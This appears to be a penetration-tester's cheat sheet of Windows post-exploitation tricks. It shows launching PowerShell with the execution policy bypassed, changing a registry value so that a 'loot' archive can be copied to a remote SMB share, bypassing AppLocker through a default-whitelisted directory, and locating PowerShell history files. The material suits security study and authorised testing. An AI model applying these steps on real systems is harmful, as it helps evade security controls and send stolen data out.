Windows
PowerShell's execution policy
PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.
Load a powershell shell with execution policy bypassed :
C:\> powershell -ep bypass
Registry
Edit key
To fix the following error, you need to set AllowInsecureGuestAuth
, located in HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters
, to 1
.
PS C:\Users\Administrator> copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access. These
policies help protect your PC from unsafe or malicious devices on the network.
At line:1 char:1
+ copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-Item], IOException
+ FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand
You can do it with powershell :
PS C:\Users\Administrator> Set-Itemproperty -path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' -Name 'AllowInsecureGuestAuth' -value 1
Bypass AppLocker
If AppLocker
is configured with default AppLocker rules, we can bypass it by placing our executable in the following directory: C:\Windows\System32\spool\drivers\color
(whitelisted by default).
Powershell history
- ConsoleHost_history :
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt